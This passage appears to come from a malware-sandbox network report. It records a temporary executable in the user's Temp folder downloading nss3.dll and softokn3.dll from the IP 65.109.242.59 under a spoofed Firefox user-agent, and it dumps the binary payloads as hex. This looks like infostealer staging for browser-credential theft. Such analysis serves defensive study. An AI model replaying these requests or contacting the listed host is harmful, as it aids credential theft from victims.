                                                                      2024-05-26 08:29:27 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                      Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                      Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                      Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                      Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                      Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                      Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.44978465.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:28 UTC170OUTGET /nss3.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:29 UTC248INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:28 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 2046288
                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                      Connection: close
                                                                      ETag: "6315a9f4-1f3950"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:29 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                      Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                      Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                      Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                      Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                      Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                      Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                      Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                      Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                      2024-05-26 08:29:29 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                      Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.44978565.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:31 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:32 UTC246INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:32 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 257872
                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                      Connection: close
                                                                      ETag: "6315a9f4-3ef50"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:32 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                      Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                      Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
